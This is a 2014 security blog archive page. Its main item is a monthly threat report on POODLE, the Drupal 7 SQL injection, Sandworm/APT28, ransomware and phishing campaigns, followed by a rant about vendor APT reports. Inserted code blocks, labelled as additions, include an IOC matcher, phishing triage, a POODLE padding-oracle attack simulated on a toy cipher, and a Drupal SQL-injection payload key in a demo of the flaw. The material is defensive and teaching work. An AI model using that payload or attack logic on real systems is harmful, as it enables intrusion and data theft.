Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Author Archive

GLOBAL THREAT INTELLIGENCE REPORT: OCTOBER 2014

leave a comment »


GLOBAL Threat Intelligence Report – OCTOBER 2014


Executive Summary

This month saw another fundamental flaw in a commonly used encryption protocol (POODLE, against SSL 3.0) as well as an uptick in attempts to exploit last month's Shellshock vulnerability across the Internet.

In addition, more alleged espionage campaigns were reported this month, attributed to actors such as Russia, using phishing and the other methods that APT groups commonly use against the entities they are interested in. Running through all of this is a sense that if you are on the Internet at all, you are compromised.

At a corporate level this should prick up your ears and give you pause: your company may in fact be actively compromised as you read this report. It is also important to understand the nature of the threats out there as well as the threats already inside your own networks. Relying on reports from threat intelligence firms without doing intelligence analysis for your own organization does little to stop the threats you have in your own domain.

You will find in this report highlights of what was seen over the month of October in attacks, malware, and the geopolitics of Internet and computer security. Use this information to inform your organization about the vulnerabilities in the wild, and combine it with the data from within your own org that shows how vulnerable you may be to threats like these, as well as to others you already have in situ.

Global Threats

Threat Intelligence Feeds:

Does your TI give you actionable Intelligence Analysis?

The Intelligence Cycle: https://krypt3ia.wordpress.com/2014/10/13/the-threat-intelligence-cycle-and-you/

Analysis:

Threat intelligence is being sold as a commodity today for companies to use as a means to protect their networks and domains. However, not all threat intelligence is useful to every company. Threat intelligence needs to be analysed by the local security team and the business to understand whether it applies to their situation. Lately the intelligence put out by the likes of FireEye, Mandiant and others has been about nation state actors that may have no interest in your company's network in the first place. It is still worth gathering what data the feeds do have, applying detection rules, and patching the vulnerabilities reported on. However, the indicators published to date for campaigns such as APT28 (C&C hosts and other IOCs) are unlikely to apply to you unless you are in Ukraine or part of NATO.

On the other side of this equation, the 0day that was used, and the patch Microsoft has since released for it, will play a large role in stopping further attacks, because other actors (primarily criminal gangs) will try to leverage an exploit that is now in the open and available to anyone who wants to attack systems for non-political goals. It is important for executives and management to understand that not every actor, and specifically not every "Advanced Persistent Threat" you hear about in the news, is a threat you need to worry about. These are nation state actors targeting very specific things to further their political goals. These are espionage activities, so it is important to understand them, and to understand your network, your data, and what you do as a company that "may" interest them in attacking you at some point, even if only as a pivot point to attack someone you work with. An example of this is the attack on Target via the HVAC company that had weaker security than Target itself. Vet all your intelligence feeds by analysing the data being given to you and aligning it to your business model and your network, security posture, and profile.

APT Espionage Activities:

Sandworm and APT-28

Two APT campaigns were recently unearthed by two different threat intelligence companies and released to the Internet. The first, reported by iSIGHT, was dubbed "Sandworm" because the malware involved had strings referencing Frank Herbert's Dune trilogy encoded in it. APT28 was reported shortly afterwards by FireEye and covers much the same territory: ostensibly the same actor (Russia, alleged to be the FSB) against the same targets, NATO and Ukraine, and in the case of Sandworm also some networks concerned with power generation and ICS.

https://nakedsecurity.sophos.com/2014/10/15/the-sandworm-malware-what-you-need-to-know/

http://thehackernews.com/2014/10/APT28-Russian-hacker-cyber-espionage.html

Analysis:

Both of these campaigns attacked the Ukrainian and NATO interests that the FSB and the Russian body politic care about. Where this type of activity meets your own interests lies in the fact that the 0day these campaigns used may be re-purposed by criminal gangs seeking to steal data such as credit cards and personal information. Seek out the reports on the 0day and the corresponding Microsoft patch, fold it into your patch cycle, and verify that re-use is not possible in your environment. Also, since many crime syndicates in the Baltics are reported to share command and control infrastructure as well as coders with the FSB, you should load the published C&Cs into your detection systems to ensure that any traffic to them is detected, blocked, and reported on.
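The advice above (vet the feed, then run its indicators against your own logs rather than just reading the report) is mechanical enough to show in code. The following is an added example, not code from the original report or from any vendor; the indicator feed and the squid-style proxy log lines are constructed for illustration, and none of the domains or addresses are real indicators. It does suffix matching on domains (so a subdomain of an indicator hits, but a look-alike such as notupdate-service.example does not) and CIDR matching on addresses, then counts hits per internal client so the noisiest hosts surface first.

```python
"""Match a threat-intelligence indicator list against your own proxy logs.

Added example, not part of the original report. Indicator values and log lines
are constructed for illustration; nothing here is a real C&C.
"""
import ipaddress
import re
from collections import Counter

# --- constructed IOC feed (hypothetical values, NOT real indicators) ---
IOC_FEED = """
# type,value,campaign
domain,update-service.example,sample-campaign
domain,cdn.static-host.test,sample-campaign
ip,198.51.100.0/24,sample-campaign
ip,203.0.113.7,sample-campaign
"""

# --- constructed proxy log lines: ts client dest status method url ---
PROXY_LOG = """
1414771200.101 10.0.5.23 198.51.100.45 TCP_MISS/200 GET http://198.51.100.45/gate.php
1414771201.220 10.0.5.23 93.184.216.34 TCP_MISS/200 GET http://www.example.org/
1414771202.330 10.0.7.9 192.0.2.88 TCP_MISS/200 GET http://news.update-service.example/check
1414771203.440 10.0.7.9 192.0.2.88 TCP_MISS/200 GET http://news.update-service.example/check
1414771204.550 10.0.9.1 203.0.113.7 TCP_MISS/404 POST http://203.0.113.7/upload
1414771205.660 10.0.9.1 192.0.2.10 TCP_MISS/200 GET http://notupdate-service.example/
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<dest>\S+)\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)$")
HOST_RE = re.compile(r"^[a-z]+://(?P<host>[^/:]+)")


def load_iocs(feed_text):
    """Parse the feed into a domain->campaign map and a list of (network, campaign)."""
    domains, networks = {}, []
    for line in feed_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, value, campaign = (f.strip() for f in line.split(","))
        if kind == "domain":
            domains[value.lower()] = campaign
        elif kind == "ip":
            networks.append((ipaddress.ip_network(value, strict=False), campaign))
    return domains, networks


def domain_hit(host, domains):
    """Return (indicator, campaign) if host equals an IOC domain or is a subdomain of one."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):          # walk up: a.b.c -> a.b.c, b.c, c
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate, domains[candidate]
    return None


def ip_hit(addr_text, networks):
    """Return (network, campaign) if addr_text is an address inside an IOC network."""
    try:
        addr = ipaddress.ip_address(addr_text)
    except ValueError:
        return None
    for net, campaign in networks:
        if addr in net:
            return str(net), campaign
    return None


def match_log(log_text, domains, networks):
    """Yield one hit per log line whose URL host or destination IP is an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        host_m = HOST_RE.match(m["url"])
        host = host_m["host"] if host_m else ""
        hit = domain_hit(host, domains) or ip_hit(host, networks) or ip_hit(m["dest"], networks)
        if hit:
            indicator, campaign = hit
            hits.append({"client": m["client"], "indicator": indicator,
                         "campaign": campaign, "url": m["url"]})
    return hits


def summarize(hits):
    """Hits per internal client, so repeat beaconing stands out from a one-off."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    found = match_log(PROXY_LOG, *load_iocs(IOC_FEED))
    for h in found:
        print(f"{h['client']:12} -> {h['indicator']:24} [{h['campaign']}] {h['url']}")
    print(summarize(found))
```

The same script works unchanged against a DNS query log if you adapt `LOG_RE`; the point is that the feed only becomes intelligence once it has been run against data from your own domain and the resulting hits analysed.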


Malware & Crimeware

Crowti

Crowti Crypto-Malware Hits the United States

Win32/Crowti is Microsoft's name for the CryptoWall family of ransomware, which extorts the end user into paying the attacker for the key to decrypt their files after infection. Once run, the malware encrypts the user's documents and other data files on local drives and on any mapped or removable drives it can reach and leaves ransom notes demanding payment; the system itself still boots, but the data on it is held hostage. This malware is being sent through various phishing campaigns and is also reported to be loaded onto machines by exploit kits and other crimeware frameworks used by criminal gangs.

http://news.softpedia.com/news/Crowti-Crypto-Malware-Hit-the-United-States-463623.shtml

Analysis:

Microsoft reported a spike in Crowti in October, with roughly 4,000 infected systems seen in that month alone, largely in the United States. The ransomware is distributed through spam email with malicious attachments posing as documents (invoices, faxes, complaints, reports) or missed-call notifications. If you are seeing this traffic you should block the subjects, senders, IPs and any other pertinent details in your spam filtering. If you are infected, do not pay the ransom; reports show that keys are not reliably forthcoming from the extortionists. Instead re-image the infected machines and restore the lost data from backups, which is one more reason to keep offline backups of user data.

Multiple Infection Phishing Campaign

Remittance Confirmation

Site Management Services (Central) Ltd Remittance Confirmation – Word doc malware

An email reading "Please find attached Remittance and BACS confirmation for September and October Invoice", pretending to come from random names, companies and email addresses, with a subject of "Remittance Confirmation [random characters]", is another from the current bot runs that try to download Zbot variants, CryptoLocker-style ransomware and a load of other malware onto your computer. They use email addresses and subjects that entice a user to read the email and open the attachment. A very high proportion are targeted at small and medium-sized businesses, in the hope of a better response than they get from consumers.

http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/

Analysis:

This malware campaign started on October 31st 2014 and so far has gone undetected by most AV clients; the only vendor to flag it early on was Sophos, as a Trojan. The attachment seen today was a .doc file (ZY5088152.doc); when opened, the document appears empty, but macros inside the Word file attempt to download malware. The campaign has been widespread, so everyone should be on the lookout for it. The email subject is:

REMITTANCE CONFIRMATION *insert random string of numbers*

Once loaded, the malware attempts to download other packages (anything and everything, it seems) in a gangbuster attempt to infect the machine in order to steal keystrokes and banking data.
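The two campaigns above (Crowti and the Remittance Confirmation run) share the same shape: a lure subject, lure wording in the body, and a legacy Office attachment that carries macros. The following is an added example, not code from the original report, showing how to triage inbound mail against those traits and extract the fields you would push into the spam gateway as block entries. The two messages are constructed here with the standard library so it runs offline; the scoring weights and the sender/recipient domains are illustrative assumptions, and the attachment is just an OLE header followed by zeros, not a real document.

```python
"""Triage inbound mail against the lure traits seen in the Crowti and
"Remittance Confirmation" runs: lure subject, lure wording, risky attachment
extension, legacy binary Office container (which can carry VBA macros).

Added example, not from the original report. Messages are constructed below;
weights and domains are illustrative.
"""
import email
import re
from email import policy
from email.message import EmailMessage

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"      # legacy .doc/.xls container header
RISKY_EXT = {".doc", ".docm", ".xls", ".xlsm", ".zip", ".scr", ".exe", ".js", ".cab"}
LURE_WORDS = ("remittance", "bacs", "invoice", "fax", "missed call", "complaint", "report")
SUBJECT_RE = re.compile(r"^\s*(re:\s*)?remittance confirmation\b", re.I)


def triage(raw):
    """Score one RFC 5322 message; returns score, reasons and a verdict."""
    msg = email.message_from_string(raw, policy=policy.default)
    score, reasons = 0, []
    if SUBJECT_RE.match(str(msg.get("Subject", ""))):
        score += 3
        reasons.append("subject matches the Remittance Confirmation lure")
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content().lower() if body is not None else ""
    if any(word in text for word in LURE_WORDS):
        score += 1
        reasons.append("lure wording in body")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = name[name.rfind("."):] if "." in name else ""
        if ext in RISKY_EXT:
            score += 2
            reasons.append(f"risky attachment type: {name}")
        payload = part.get_content()              # bytes for non-text parts
        if isinstance(payload, bytes) and payload.startswith(OLE_MAGIC):
            score += 1
            reasons.append(f"legacy OLE document (may contain macros): {name}")
    verdict = "quarantine" if score >= 4 else "review" if score >= 2 else "deliver"
    return {"score": score, "reasons": reasons, "verdict": verdict}


def block_rules(raw):
    """Pull the fields you would push into the spam gateway as block entries."""
    msg = email.message_from_string(raw, policy=policy.default)
    return {
        "sender": str(msg.get("From", "")),
        "subject_pattern": SUBJECT_RE.pattern,
        "attachments": [(p.get_filename() or "").lower() for p in msg.iter_attachments()],
    }


def build_sample(subject, body, attachment=None, sender="accounts@supplier-example.test"):
    """Build a raw message so the example runs offline (constructed, not real mail)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "ap@victim-example.test"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment is not None:
        name, data = attachment
        msg.add_attachment(data, maintype="application", subtype="msword", filename=name)
    return msg.as_string()


# Constructed samples in the style of the campaign described above.
LURE_MAIL = build_sample(
    "REMITTANCE CONFIRMATION 5088152",
    "Please find attached Remittance and BACS confirmation for September and October Invoice",
    ("ZY5088152.doc", OLE_MAGIC + b"\x00" * 64),
)
BENIGN_MAIL = build_sample("Lunch on Friday?", "Are you free for lunch on Friday?")

if __name__ == "__main__":
    for label, raw in (("lure", LURE_MAIL), ("benign", BENIGN_MAIL)):
        print(label, triage(raw))
    print(block_rules(LURE_MAIL))
```

Blocking on the sender alone is weak, since these runs rotate random names and addresses; the subject pattern and the attachment type are the stable parts, which is why they carry most of the score here.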

Dyre/Dyreza

Phishing Campaign Linked with “Dyre” Banking Malware

The Dyre malware allows attackers to steal online banking passwords and other credentials by infecting users' computers and hooking the browser, so that the victim appears to be communicating with their financial institution while traffic is intercepted or redirected to fake pages. The malware can also record keystrokes until it captures the data the attackers want. It is spread by varying phishing attacks and is still evolving; the most common vector has been phishing emails with malware-laden PDF files. The campaigns have been exploiting known Adobe Reader vulnerabilities, CVE-2013-2729 and CVE-2010-0188, both patched long ago, rather than true 0days.

https://www.us-cert.gov/ncas/alerts/TA14-300A

Hackers’ new Dyre malware infects W.Pa. computers, vexes FBI cyber agents

http://triblive.com/news/editorspicks/7047006-74/dyre-hackers-malware#ixzz3HkJCrg33

Analysis:

The Dyre malware has been around since earlier this year and still poses a threat. It is recommended that everyone patch for the Adobe vulnerabilities seen in these attacks and increase user awareness so that such files are not opened. The user is the front line against malware and phishing, so they should be as aware as possible of the dangers of opening unverified files and links from emails whose senders they do not know. Awareness programs should also extend to phishing your own environment as part of education, to re-educate users who consistently click on links and files without checking them first.


Hackers using Gmail drafts to steal data and update malware

A malware and hacking campaign recently detected uses Gmail drafts to communicate with its command and control without ever hitting send on a mail. It is unclear exactly what the malware is, but the command and control method, using Gmail drafts as the channel, is novel.

“What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” said Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” (itproportal.com)

http://www.itproportal.com/2014/10/30/hackers-using-gmail-drafts-steal-data-and-update-malware/#ixzz3HkJSdTds

Analysis:

This attack seems to be very targeted and may end up being part of a release later on in a bigger campaign, whether nation state or crimeware driven. The interesting bit is the use of Gmail drafts as the C&C channel. Keep an eye on this for the future, and consider how Gmail is used within your domains, whether for personal or corporate business. It is really a bad idea to carry out company business on services like Gmail, but some places actually allow it. In either case, this now provides a new channel, reportedly implemented in Python, to exfiltrate data from your network over a service your proxies already allow.


Vulnerabilities

Poodle

POODLE vulnerability in SSL 3.0

POODLE is the name for a vulnerability in, and attack on, the SSL 3.0 protocol. This is an older protocol, and everyone should be on TLS by now as the de facto means of encrypting these tunnels. However, a flaw in SSL 3.0's CBC padding (the padding bytes are not checked, only the length byte) lets an attacker positioned as a man-in-the-middle decrypt selected bytes of the traffic one byte at a time. In practice the attacker has to route the victim's traffic through an intermediary system and induce the victim's browser to send many near-identical requests (on the order of 256 per byte recovered), which is enough to recover a session cookie; it does not recover the session key.

http://www.kb.cert.org/vuls/id/577193

Analysis:

This attack is most available to attackers who already have a position on the path of the encrypted session. In practice the easiest place to pull it off is against someone on a rogue Wi-Fi AP or in similar scenarios, so it is more pertinent for mobile users (e.g. working from a cafe) than anyone else. It is important that within your environment you disable SSLv3 in all browsers, and any Internet-facing systems you run should likewise have SSLv3 disabled and be set to TLS only. Newer browser releases, including Chrome, are now moving to disable SSLv3 by default.
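To make the "unchecked padding" point concrete, here is an added example (not from the original report, and not from any real TLS stack) that simulates the POODLE attack end to end. It stands in a toy hash-based Feistel block cipher for AES/3DES so it runs offline with nothing but the standard library; what matters, and what follows the protocol, is the CBC chaining, the SSL 3.0 padding rule (last byte is the filler count, the filler itself is never checked) and the MAC-then-encrypt record layout. The server function is the oracle: it only says accept or reject. The attacker copies the ciphertext block holding the target byte over the final all-padding block and watches for an accept; the secret, keys and request alignment are constructed assumptions.

```python
"""POODLE (SSL 3.0 CBC padding oracle) worked through on a toy cipher.
Added example; the Feistel cipher is a stand-in for AES and must never be
used for anything real. Padding rule, chaining and MAC layout follow SSL 3.0.
"""
import hashlib
import hmac
import random

BLOCK = 16
ROUNDS = 8


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Round function of the toy Feistel cipher (keyed SHA-256, 8-byte halves).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)


def ssl3_pad(data):
    # SSL 3.0: last byte = number of filler bytes; the filler itself is never checked.
    pad_len = BLOCK - (len(data) % BLOCK) - 1
    return data + bytes(pad_len) + bytes([pad_len])


def ssl3_seal(enc_key, mac_key, iv, data):
    tag = hmac.new(mac_key, data, hashlib.sha256).digest()[:16]   # MAC-then-encrypt
    return cbc_encrypt(enc_key, iv, ssl3_pad(data + tag))


def ssl3_open(enc_key, mac_key, iv, ct):
    """Receiver: strip padding by its length byte, then check the MAC.
    True = record accepted; False = alert. That one bit is the oracle."""
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK or len(pt) - pad_len - 1 < 16:
        return False
    body = pt[:len(pt) - pad_len - 1]
    expect = hmac.new(mac_key, body[:-16], hashlib.sha256).digest()[:16]
    return hmac.compare_digest(expect, body[-16:])


def poodle_recover_byte(send, accepts, block_index, max_tries=100_000):
    """Recover byte 15 of plaintext block `block_index` (blocks numbered from 0).
    send(): victim emits a fresh record whose last block is all padding.
    accepts(iv, ct): the server oracle. The MITM overwrites the final block with
    the target block; the server accepts iff D(C_t)[15] ^ C_{n-1}[15] == BLOCK-1,
    hence P_t[15] = (BLOCK-1) ^ C_{n-1}[15] ^ C_{t-1}[15]. Returns (byte, requests)."""
    for tries in range(1, max_tries + 1):
        iv, ct = send()
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        target = blocks[block_index + 1]            # blocks[0] is the IV
        if accepts(iv, ct[:-BLOCK] + target):
            return (BLOCK - 1) ^ blocks[-2][15] ^ blocks[block_index][15], tries
    raise RuntimeError("oracle never accepted; the last block must be pure padding")


def build_demo(seed=2014):
    """Constructed victim/server pair. The attacker-controlled prefix makes
    data+MAC a whole number of blocks, forcing a full padding block (what the
    real attack's JavaScript achieves by sizing the request path)."""
    rng = random.Random(seed)
    enc_key = bytes(rng.getrandbits(8) for _ in range(16))
    mac_key = bytes(rng.getrandbits(8) for _ in range(16))
    secret = b"Cookie: sid=8f3a9c1b"               # constructed sample secret
    data = b"A" * (-len(secret) % BLOCK) + secret

    def send():                                     # fresh IV per request, as each record differs
        iv = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        return iv, ssl3_seal(enc_key, mac_key, iv, data)

    def accepts(iv, ct):
        return ssl3_open(enc_key, mac_key, iv, ct)

    return data, send, accepts


def demo(block_index=1, seed=2014):
    """Returns (recovered_byte, actual_byte, requests_needed)."""
    data, send, accepts = build_demo(seed)
    recovered, tries = poodle_recover_byte(send, accepts, block_index)
    return recovered, data[block_index * BLOCK + BLOCK - 1], tries


if __name__ == "__main__":
    rec, actual, tries = demo()
    print(f"recovered 0x{rec:02x} (actual 0x{actual:02x}) after {tries} requests")
```

Each recovered byte costs about 256 requests on average, and the real attack shifts the request by one byte at a time so that each cookie byte in turn lands at position 15 of a block. TLS 1.0 and later reject records whose padding bytes are not all equal to the length byte, which is why the fix is simply to stop negotiating SSL 3.0.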

WGET:

Wget creates arbitrary symbolic links during recursive FTP downloads

GNU wget allows arbitrary filesystem access when creating symbolic links during a recursive FTP download. This allows an attacker to overwrite files with the permissions of the user running wget. A malicious FTP server, when configured to provide symlinks in the directory listing, can force the wget client to enter the specified local symlink, navigating the local file system for the attacker. Wget will then download and create or overwrite existing files within the local symlink, setting permissions to those of the remote files.

http://www.kb.cert.org/vuls/id/685996

Analysis:

The impact depends on the privileges of the user running wget, because the symlink is created and the files are written with that user's permissions. A mirroring job run from cron as root, or as an account with broad rights, turns this into a full compromise of the client host, whereas a low-privilege account limits the damage. Note that it is the wget client, not an FTP server you operate, that is vulnerable: the malicious party is the server you are downloading from. Upgrade to a fixed wget (1.16 or later), or as a workaround set retr-symlinks=on in your wgetrc (or pass --retr-symlinks) so wget retrieves the linked file instead of creating a local symlink. Beyond that, ask whether you need FTP in the first place: what data is moving in and out over it, and should you not be using SFTP or FTPS to start with?

DRUPAL

Drupal Releases Public Service Announcement

Drupal released a public service announcement to address active exploitations of a previously patched vulnerability found in Drupal core 7.x versions prior to 7.32. Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 – Drupal core – SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

https://www.us-cert.gov/ncas/current-activity/2014/10/29/Drupal-Releases-Public-Service-Announcement

Analysis:

There is an ongoing automated SQL injection attack against Drupal 7 that updating to 7.32 (or applying the one-line patch) will stop for sites not yet hit. The patch does not undo a compromise that has already happened: attackers may have copied all data out of your site, planted backdoors, or created admin accounts, and there may be no trace of the attack in the logs. If your site was not patched within hours of the advisory, treat it as compromised and, as Drupal's own PSA recommends, restore from a backup taken before October 15th rather than trusting a patched-after-the-fact install.
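The Drupal advisory does not spell out why a parameterised query was injectable, and that is the instructive part. The following is an added example, a Python rendering of the pattern and not Drupal's own (PHP) code: Drupal 7's database layer rewrites a placeholder such as `:name` into `:name_0, :name_1, ...` when the bound value is an array. Before 7.32 the suffix came from the array key, which on the login form comes straight from the request (a field submitted as `name[0 ;EVIL]=x`), so attacker text landed in the SQL string even though the values themselves were bound safely; the 7.32 fix takes the suffix from the array position instead. Only the query string is built here, nothing is executed against a database, and the attacker-style key is a constructed sample in the shape of the in-the-wild exploits.

```python
"""Placeholder-expansion bug behind Drupal SA-CORE-2014-005, rendered in Python.

Added example, not Drupal's code. Only the SQL text is built; nothing runs.
"""
import re

QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"


def _expand(query, args, suffixes):
    """Shared mechanics: replace `:key` with derived placeholders and rebind the
    values under those names. `suffixes(data)` decides where the suffix comes from."""
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):        # PHP arrays are ordered maps; dict stands in
            continue
        new_keys = {f"{key}_{suffix}": value for suffix, value in suffixes(data)}
        joined = ", ".join(new_keys)
        query = re.sub(re.escape(key) + r"\b", lambda _m: joined, query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_arguments_vulnerable(query, args):
    """Pre-7.32: foreach ($data as $i => $value) -> suffix is the caller's array KEY."""
    return _expand(query, args, lambda data: data.items())


def expand_arguments_fixed(query, args):
    """7.32: foreach (array_values($data) as $i => $value) -> suffix is the position."""
    return _expand(query, args, lambda data: enumerate(data.values()))


def statements(query):
    """Crude check: a single parameterised SELECT should yield exactly one statement."""
    return [s for s in re.split(r";\s*", query) if s.strip()]


# Constructed inputs. NORMAL_ARGS is what a legitimate array bind looks like;
# ATTACK_ARGS is the login field submitted as an array with SQL in its key.
NORMAL_ARGS = {":name": {0: "alice", 1: "bob"}}
ATTACK_ARGS = {":name": {"0 ;UPDATE users SET name='owned' WHERE uid=1;#": "x", "0": "y"}}

if __name__ == "__main__":
    for label, fn in (("vulnerable", expand_arguments_vulnerable), ("fixed", expand_arguments_fixed)):
        q, bound = fn(QUERY, ATTACK_ARGS)
        print(f"{label:10}: {q}")
        print(f"{'':10}  bound: {bound}  statements: {len(statements(q))}")
```

With the fix the malformed input still produces a syntactically odd query (`name = :name_0, :name_1`), which the database rejects; the point is that the attacker's text now only ever reaches the database as a bound value, never as part of the statement. The same class of bug appears anywhere a "safe" query builder splices caller-controlled names, not just values, into SQL.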

IBM WebSphere

IBM WebSphere Application Server contains multiple vulnerabilities

IBM WebSphere Application Server, including the Hypervisor Edition, contains a cross-site request forgery (CSRF) vulnerability in the Administrative Console. The application also provides a URL that allows authenticated users to directly create and modify their session variables (“Session Injection”), including CSRF tokens.

http://www.kb.cert.org/vuls/id/573356

Analysis:

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end user's browser session. Additionally, a remote unauthenticated attacker may be able to trick an authenticated administrator into making an unintended request to the Administrative Console, which will be treated as authentic and may result in information disclosure or modification; the session-injection URL compounds this, since it lets a user overwrite the very CSRF token that is meant to stop such requests. Restrict network access to the Administrative Console and apply the IBM fixes referenced in the CERT note.

0Day

Microsoft CVE-2014-4114 (SANDWORM)

Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a “Sandworm” attack in June through October 2014, aka “Windows OLE Remote Code Execution Vulnerability.”

https://technet.microsoft.com/library/security/ms14-060

Analysis:

An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user, and failed exploit attempts will likely result in denial-of-service conditions. This 0day has now been patched with MS14-060. That security update resolves a privately reported vulnerability in Microsoft Windows which could allow remote code execution if a user opens a Microsoft Office file that contains a specially crafted OLE object. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user; if the current user is logged on with administrative rights, the attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured with fewer rights on the system are less impacted than those who operate with administrative rights, which is one more argument for not giving day-to-day users local admin.

Directed Threats

<enter your own data here from IDS/SIEM/AV/LOG CORRELATION> for your own organization and report on what you are seeing on your network.

WORD FILE: to download and tailor to your org and give to your execs is HERE

Written by Krypt3ia

2014/10/31 at 20:39

SAND APT WORM 28 Screedle

leave a comment »


SANDWORMS AND APT’S

Recently there has been a hubbub over iSight’s dox drop on what they called Sandworm. This was a group of Russian actors (alleged) that were spying digitally on Ukraine and NATO with malware and phishing. The program had been ongoing for a long time and iSight needed that market share so they dropped their report on us all, ya know, to let us all know that Russia spies on shit like Ukraine when they are in a heated battle with that runaway state.

WHO’DA THUNK IT??

Anywho, now FireEye wants to get in on the action and has dropped their report on APT-28… AKA Sandworm. They pretty much say the same things. There’s a group of Russians out there spying digitally on Ukraine and NATO with malware and phishing.

WOO

At least the FireEye report is less derpy than the iSight report so there is that. Sure the APT-28 report gives more IOCs and such for the technowonks out there to follow up on and maybe put the C&Cs in their collective SIEMs but really, what use is all this to the rest of us? Nada. Nada and this burns my ass. I really hate all this posturing bullshit marketing that passes for intelligence. To my amazement even the FireEye report states that this is nothing new and that these guys have been in the news in security circles for some time. Now it’s just time to make them a new BUZZWORD for the marketing and this is what makes me apoplectic about all of these services out there.

What have we learned here in this report?

  • Russian APT uses phishing
  • Russian APT uses obfuscation in code
  • Russian APT use Cyrillic keyboards
  • Russian APT knows more than one language
  • Russian APT are sneaky

No.. Really? As the report remarks, there is nothing new here.. So why post it?

MARKETING

All of this from FireEye as well as iSight is just tit for tat marketing to garner media attention for their “services” and nothing more. There is nothing in this report that really applies to the average blue team player unless you are in Ukraine or in NATO and ya know what? Those guys already know because they have been briefed by the intelligence agencies. So really, there is very little value to these reports to the common security player. It’s all just marketing HOODOO and we should all just see it as that ok?

“But it’s cool and now we have TTP’s on the Russki’s” you say… Well fuck that. The intelligence agencies are the players in that space not you. How many of you out there not in Defense base companies have EVER run into a known C&C for APT on your networks actively being used?

…. Anyone?

Yeah, thought so. Look, FireEye reports are the new EBOLA of ISIS! It’s utter wankery.

POLITICS

Meanwhile, some on my time-line asked a very pertinent question.. “Just how long has FireEye been the US government’s lapdog anyway?” To which my answer was “since APT-1″. This report feels more like a mix of marketing as well as political pokery on the part of FE for the US government, which happens to be having a pissing match over Ukraine and general Pooty Poot fuckery. So really, is this a report that we can all use or is this just a grab for political fuckery and money through self-aggrandizing and self-serving marketing to preserve market share that maybe iSight was perceived to have taken from them?

Your mileage may vary…

K.

Written by Krypt3ia

2014/10/28 at 17:13

Posted in .gov, .mil, APT

Tweeter, Jihadi, Soldier, Spy: OSINT in the Twitter JIHAD

with 3 comments


IS and the Propaganda Wars

Since the time that Zarqawi created AQI and got UBL’s approval, the latter-day ISIL/IS/Daesh group was a rag-tag crew of angry guys looking to blow shit up. Post Abu’s passing and with the rise of Abu Bakr, the ISIL/IS/Daesh group has grown not only in numbers but also in savvy on messaging and recruiting. Of course some of this has to do with the shifting nature of the region given all the politics and US screw-ups since the invasion in 2003 that allowed the group to coalesce into what we have today running amok in the region. Once the group really gained traction though, and AQ even turned their back on them for being too brutal, IS became a force to be reckoned with in the area, but now they have spread onto the internet as a means of propaganda warfare and recruitment. Much to the United States’ chagrin they have been all too successful in propagating their message as well as giving fodder to the mainstream media to roll out the fear machine and set it to eleven.

Twitter Jihad


Primarily IS took the model that AQAP had started and learned what AQAP did not. IS is much more capable at propaganda and slick messaging than AQAP ever was. IS has even now started its own magazine, “Dabiq”, which is much like the Inspire magazine but seems to be much more art-directed than Inspire was. Now the Daesh has even broken into full-blown advertising with small propaganda films that film school students probably look at and swoon over for their slick nature and editing. These things though do not have as much reach without the Twitter Jihad that is going on in tandem and as their medium for dissemination.

Twitter has been the battle ground of late in the war of ideas between IS and the world. Of course the US has decided that either the accounts on Twitter should be banned (or maybe that is just Twitter making that decision?) but it seems that the net effect here is a great game of whack-a-mole while the world burns. The US has frankly been stymied to come up with a good solution to the problem of the propaganda that IS has been using to get the ummah to come to the jihad but recently they decided that trolling might be the answer they need.


